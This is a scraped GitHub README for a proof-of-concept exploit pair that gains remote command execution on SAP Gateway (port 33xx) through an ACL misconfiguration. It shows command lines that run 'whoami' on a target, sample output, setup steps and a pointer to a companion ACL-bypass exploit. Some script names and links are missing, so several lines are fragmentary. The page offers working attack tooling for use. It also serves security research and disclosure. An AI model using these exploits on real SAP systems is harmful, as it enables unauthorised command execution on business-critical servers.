Skip to content
SAP Gateway RCE exploits
Branch: master
Clone or download
Latest commit f6c8a93 Apr 24, 2019
Type Name Latest commit message Commit time
Failed to load latest commit information.
COPYING add lic invormation Apr 22, 2019 Update Apr 24, 2019 add first version og exploit Apr 11, 2019 add some info and links Apr 22, 2019
requirements.txt add some info and links Apr 22, 2019

What is it?

This PoC exploits an ACL misconfiguration in the SAP Gateway (port 33xx) that leads to a Remote Command Execution (RCE). is the first version of the exploit based on raw packets sent. It does not require any additional modules (Run and Pwn!). is the second version of the exploit based on the pysap library.


These PoCs were developed by Dmitry @_chipik Chastuhin

How to use

➜python -t -p 3300 -c whoami
[*] sending cmd:whoami
➜python -t <ip> -p 3300 -c whoami
[INFO ] Response: OK
[INFO ] [+] Sending F_SAP_INIT
[INFO ] Response: OK
[INFO ] [+] Sending F_SAP_SEND
[INFO ] [+] Sending F_SAP_SEND2


Only for SAPanonGWv2.p

git clone
pip install -r pysap/requirements.txt
python pysap/ install
git clone


git clone
pip install -r SAP_GW_RCE_exploit/requirements.txt

SAP GW ACL bypass

You can use these exploits together with SAP MS Trusted exploit that allows you to bypass dafault sec_info ACL

See our presentation for details


Contributions made by:

You can’t perform that action at this time.